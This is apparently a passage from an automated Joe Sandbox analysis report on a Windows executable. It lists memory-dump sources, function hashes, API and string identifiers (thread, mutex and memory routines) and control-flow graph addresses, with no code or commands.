                                                                    • Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd
                                                                    Similarity
                                                                    • API ID: malloc$ExceptionFilterInfoSleepStartupUnhandledmemcpy
                                                                    • String ID:
                                                                    • API String ID: 772431862-0
                                                                    • Opcode ID: f85f7434ef34ca8fea9adb256391a91387b5457ced506d25832c3763a6de91f3
                                                                    • Instruction ID: cc77f7c200330d109750f9f4391da373b849b9f1139b974a0bfe6c68f88ece4e
                                                                    • Opcode Fuzzy Hash: f85f7434ef34ca8fea9adb256391a91387b5457ced506d25832c3763a6de91f3
                                                                    • Instruction Fuzzy Hash: 2F916835E29657E1EB60AB96EA41B7D2BA1BF55780F4C4135DE0DE3792DF2CE8428300
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true
                                                                    • Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd
                                                                    Similarity
                                                                    • API ID: strlen$malloc$CaptureContextUnwindabort
                                                                    • String ID:
                                                                    • API String ID: 3412053993-0
                                                                    • Opcode ID: 91e57bacc0d8cdc9738f951960cfd1da9c6fb9b24bff88cb80a7e28fbeebe90b
                                                                    • Instruction ID: afcfab1082b7e48a3eb92457763b723a0493a1f427335a5e8b4af971d1f38491
                                                                    • Opcode Fuzzy Hash: 91e57bacc0d8cdc9738f951960cfd1da9c6fb9b24bff88cb80a7e28fbeebe90b
                                                                    • Instruction Fuzzy Hash: C6616F34A0A607B0EA14AB57B9553B66760BF4ABC9F881435ED8DAB396DF3CE044C344
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true
                                                                    • Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd
                                                                    Similarity
                                                                    • API ID: strlen$malloc$CaptureContextUnwindabort
                                                                    • String ID:
                                                                    • API String ID: 3412053993-0
                                                                    • Opcode ID: 0530b2e8acd1ac2ac662b571c82e61b0b7f385c1e6f4f4076ee8c420478a61e7
                                                                    • Instruction ID: 549f1dca3e95ed8d2dc24445a4ae46dee3fbfb0dee9cf17b0f9300d0494d5349
                                                                    • Opcode Fuzzy Hash: 0530b2e8acd1ac2ac662b571c82e61b0b7f385c1e6f4f4076ee8c420478a61e7
                                                                    • Instruction Fuzzy Hash: 3C518135A0A607A0FA14AB17F9553BA6760BB497C8F8C1435ED8DAB3A6DF7CE044C344

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true
                                                                    • Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd
                                                                    Similarity
                                                                    • API ID: AtomMutex$CloseCreateCurrentFindHandleObjectProcessReleaseSingleWait_onexit
                                                                    • String ID: HeBnAaAa__shmem3_winpthreads_tdm_$__shmem3_winpthreads_tdm_$__shmem3_winpthreads_tdm_-aaaaaaaaaaaaaaaaaaAAAAAAAAAAAaAAaaAaAaaaaaAaaaAAAAAAAaAaaaaaaaaa$aaaaaaaa$aaaaaaaa$failed to add string to atom table$failed to get string from atom$failed to to lock creation mutex
                                                                    • API String ID: 2382646235-3361693878
                                                                    • Opcode ID: 690893634bc7b04103c4787aa525d25b036ac67433724b5f8e5d76a344899770
                                                                    • Instruction ID: 11476a4a1bf887ff22358db80352f14adbc6cec19463a705715be7ce659ae0ec
                                                                    • Opcode Fuzzy Hash: 690893634bc7b04103c4787aa525d25b036ac67433724b5f8e5d76a344899770
                                                                    • Instruction Fuzzy Hash: 2F615D75E1CA43F5EA558B24E9062B52BA1BF58B85F8C8435C94EE7391EE3CE5078340
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true
                                                                    • Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd
                                                                    Similarity
                                                                    • API ID: CloseHandleValue$ExceptionHandlerRemoveVectored
                                                                    • String ID:
                                                                    • API String ID: 2941551293-0
                                                                    • Opcode ID: 43202f956477dc27eacbe0bad6c7aa482340bc7bd26aed3f552eb178379d61bd
                                                                    • Instruction ID: 2d7b3c2b314e083ae805d55eff69a62f395a36f7d2e633653b5d0567c0b85ee8
                                                                    • Opcode Fuzzy Hash: 43202f956477dc27eacbe0bad6c7aa482340bc7bd26aed3f552eb178379d61bd
                                                                    • Instruction Fuzzy Hash: 21224836A09B07A5EAA4AB19D6883B82BA0FF48B94F4C4535DA0DE33D1DF3CE544C341

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true
                                                                    • Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd
                                                                    Similarity
                                                                    • API ID: CloseHandleMutex$AtomCreateFindObjectReleaseSingleWait
                                                                    • String ID: HeBnAaAa__shmem3_winpthreads_tdm_$__shmem3_winpthreads_tdm_-aaaaaaaaaaaaaaaaaaAAAAAAAAAAAaAAaaAaAaaaaaAaaaAAAAAAAaAaaaaaaaaa$failed to to lock cleanup mutex
                                                                    • API String ID: 3776795807-2592781559
                                                                    • Opcode ID: 76ed951a1da5006fb37eb27b3fb7853ab9f1d7b5cb3f352cbd6bb251f6007b27
                                                                    • Instruction ID: 29e35159e65880c68d92658c376ba7cffb06ec9f36f669bf527bcde75ba99343
                                                                    • Opcode Fuzzy Hash: 76ed951a1da5006fb37eb27b3fb7853ab9f1d7b5cb3f352cbd6bb251f6007b27
                                                                    • Instruction Fuzzy Hash: 12218130B19A07E1EE549B51D9191B423A5BF48F84F8CD835C90DE73A0EE3CE446C300

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 607 7ff650232b00-7ff650232b17 608 7ff650232b1d-7ff650232b22 607->608 609 7ff650232cf0-7ff650232cfd call 7ff650236e20 607->609 611 7ff650232cd8-7ff650232cdf 608->611 612 7ff650232b28-7ff650232b36 608->612 609->612 616 7ff650232d03-7ff650232d06 609->616 613 7ff650232b3c call 7ff650232110 611->613 614 7ff650232ce5-7ff650232ce8 611->614 612->613 612->614 619 7ff650232b41-7ff650232b47 613->619 616->611 618 7ff650232d08-7ff650232d14 call 7ff650236e20 616->618 618->613 627 7ff650232d1a 618->627 620 7ff650232b49-7ff650232b4e 619->620 621 7ff650232b80-7ff650232b8d call 7ff650236e20 619->621 624 7ff650232ba0-7ff650232bb2 TlsGetValue 620->624 625 7ff650232b50-7ff650232b6c TlsGetValue 620->625 621->625 631 7ff650232b8f-7ff650232b92 621->631 628 7ff650232b6e-7ff650232b7b 624->628 629 7ff650232bb4-7ff650232bc4 call 7ff650231c50 624->629 625->628 625->629 627->619 629->628 636 7ff650232bc6-7ff650232bc9 629->636 631->624 633 7ff650232b94-7ff650232b99 call 7ff650236e20 631->633 633->624 636->628 638 7ff650232bcb-7ff650232c06 GetCurrentThreadId CreateEventA call 7ff6502385e0 636->638 641 7ff650232c0c-7ff650232c6a GetCurrentProcess GetCurrentThread GetCurrentProcess DuplicateHandle 638->641 642 7ff650232d5d-7ff650232d85 call 7ff650231fe0 638->642 643 7ff6502525a6-7ff6502525d4 abort 641->643 644 7ff650232c70-7ff650232c9d GetThreadPriority 641->644 659 7ff6502525e0 643->659 646 7ff650232d38-7ff650232d48 call 7ff650236e20 644->646 647 7ff650232ca3-7ff650232ca8 644->647 652 7ff650232d20-7ff650232d2e 646->652 657 7ff650232d4a-7ff650232d4d 646->657 651 7ff650232caa 647->651 647->652 655 7ff650232cae-7ff650232cbb TlsSetValue 651->655 652->655 655->643 658 7ff650232cc1-7ff650232cd1 655->658 657->651 660 7ff650232d53-7ff650232d58 call 7ff650236e20 657->660 659->659 660->651
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true
                                                                    • Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd
                                                                    Similarity
                                                                    • API ID: Value
                                                                    • String ID:
                                                                    • API String ID: 3702945584-0
                                                                    • Opcode ID: 83684eaa2f310da3a2962b416053b5bd576d1ab93c177668ba808363dc5378e1
                                                                    • Instruction ID: 7b770a5548073640719c73e1556fd7fd2c18d95c89b33f0c2bf3226a289604cd
                                                                    • Opcode Fuzzy Hash: 83684eaa2f310da3a2962b416053b5bd576d1ab93c177668ba808363dc5378e1
                                                                    • Instruction Fuzzy Hash: E8711732A19B03A5EA609F25E5443B87BA5FF48B94F485635CA5CA73E0EF3CE448C750

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true
                                                                    • Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd
                                                                    Similarity
                                                                    • API ID: memcpywcslen
                                                                    • String ID: $0$@$\??\$basic_string::_M_construct null not valid
                                                                    • API String ID: 982415701-2971582370
                                                                    • Opcode ID: 7495238b72a21c687f4805a010fd0b24f52b5f0a31619b6aaedad348e55fa948
                                                                    • Instruction ID: cede82e81631db9dc08c99014fbbd61979ab2e83c9ef021b0f129b85add1e94a
                                                                    • Opcode Fuzzy Hash: 7495238b72a21c687f4805a010fd0b24f52b5f0a31619b6aaedad348e55fa948
                                                                    • Instruction Fuzzy Hash: 42613532618BC2A5E7708B15E9503ABBBA0FB84784F484225DACD97B99DF7CC048CB40

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 688 7ff65022fff0-7ff650230004 689 7ff650230048-7ff650230056 call 7ff650233cc0 688->689 690 7ff650230006-7ff65023000c call 7ff650235020 688->690 694 7ff65023005b-7ff65023006e call 7ff6502302a0 689->694 693 7ff650230011-7ff650230017 690->693 695 7ff650230088-7ff6502300a0 calloc 693->695 696 7ff650230019-7ff65023001f 693->696 709 7ff6502301b8-7ff6502301ca 694->709 710 7ff650230074-7ff650230080 call 7ff6502305c0 694->710 698 7ff6502300a6-7ff6502300c3 call 7ff650235090 695->698 699 7ff6502301ea-7ff6502301f3 abort 695->699 700 7ff650230130-7ff650230155 realloc 696->700 701 7ff650230025-7ff650230031 696->701 706 7ff650230037-7ff650230044 698->706 719 7ff6502300c9 698->719 704 7ff650230200-7ff650230204 699->704 705 7ff6502301f5-7ff6502301f8 699->705 700->699 708 7ff65023015b-7ff650230183 memset call 7ff650235090 700->708 701->706 707 7ff6502300d0-7ff6502300db 701->707 714 7ff650230206 704->714 715 7ff65023020a-7ff65023020d 704->715 705->704 712 7ff650230190-7ff65023019d malloc 707->712 713 7ff6502300e1-7ff6502300ed malloc 707->713 708->712 720 7ff6502301d8-7ff6502301e5 memset 709->720 710->690 712->699 718 7ff65023019f-7ff6502301ae 712->718 713->699 721 7ff6502300f3-7ff6502300f6 713->721 714->715 722 7ff65023020f-7ff650230212 715->722 723 7ff650230214 715->723 726 7ff6502300fa-7ff650230104 718->726 719->707 727 7ff650230115-7ff650230127 720->727 721->726 722->723 728 7ff650230218-7ff65023021c 722->728 726->720 729 7ff65023010a-7ff650230112 memcpy 726->729 729->727
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true
                                                                    • Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 3a501e650562609571778c3cd1784df29f064d19f048f6386f3ce533cf91eed7
                                                                    • Instruction ID: 20d7136ed2772db7bc859c0e6c7d8173948bdf2011629a0ba0a84beb969d165b
                                                                    • Opcode Fuzzy Hash: 3a501e650562609571778c3cd1784df29f064d19f048f6386f3ce533cf91eed7
                                                                    • Instruction Fuzzy Hash: BA51B032A09A07A0EE159F15D6A06F827A4FF58B84F9C8436DE4CA7391DE3CE542C320

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true
                                                                    • Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd
                                                                    Similarity
                                                                    • API ID: memcpy$wcslen
                                                                    • String ID: $0$@$\??\$basic_string::_M_construct null not valid
                                                                    • API String ID: 1844840824-2971582370
                                                                    • Opcode ID: f685c1dfb49a532a6f74636d28d6803134a3beb93b080835381ef93c8ecdc333
                                                                    • Instruction ID: 0b8fefdf3ab299eeb3bb3ab5d69379a6f62a88ed3da3b61f3190c4901cdd6635
                                                                    • Opcode Fuzzy Hash: f685c1dfb49a532a6f74636d28d6803134a3beb93b080835381ef93c8ecdc333
                                                                    • Instruction Fuzzy Hash: F0518C32618B86A1E760CB55E9503AABBA0FBC5784F884135EACD97B99DF7CD044CB00

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true
                                                                    • Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd
                                                                    Similarity
                                                                    • API ID: memcpywcslen
                                                                    • String ID: 0$@$\??\$basic_string::_M_construct null not valid
                                                                    • API String ID: 982415701-2209788446
                                                                    • Opcode ID: d23373f5529ebf654f01c0f49d26cfe6344bf8f87aab685a573478317dfccf7f
                                                                    • Instruction ID: 6bcc499502a6ecfeb2a7cacac514423eca6ef848d63046c03528fb5ac53952ba
                                                                    • Opcode Fuzzy Hash: d23373f5529ebf654f01c0f49d26cfe6344bf8f87aab685a573478317dfccf7f
                                                                    • Instruction Fuzzy Hash: 75612432618BC6A5E7708F15E9503AABBA0FB88784F484225DACD97B99DF7CC005CB40

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1973204457.00007FF650221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF650220000, based on PE: true
                                                                    • Associated: 00000002.00000002.1973182140.00007FF650220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973238448.00007FF650253000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973262418.00007FF650255000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973448814.00007FF65046F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650471000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973489612.00007FF650477000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973580952.00007FF65047F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650481000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973617853.00007FF650484000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1973811912.00007FF650485000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff650220000_GR55Qg1hth.jbxd
                                                                    Similarity
                                                                    • API ID: CreateInternalProcessmemset
                                                                    • String ID: h
                                                                    • API String ID: 101748716-2439710439
                                                                    • Opcode ID: b4e4dcba329f30833a54755e058ee4a8727679d80d93dd874743d70506113ca5
                                                                    • Instruction ID: adf0d72b10d8ee393f917ed2711121dd8de57b9de194436eba36730b66229727
                                                                    • Opcode Fuzzy Hash: b4e4dcba329f30833a54755e058ee4a8727679d80d93dd874743d70506113ca5
                                                                    • Instruction Fuzzy Hash: 43215532608B82A2E3609B15F41479BB7A4FBC5784F544139EACC97BA8CF7CD149CB00

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Memory Dump Source
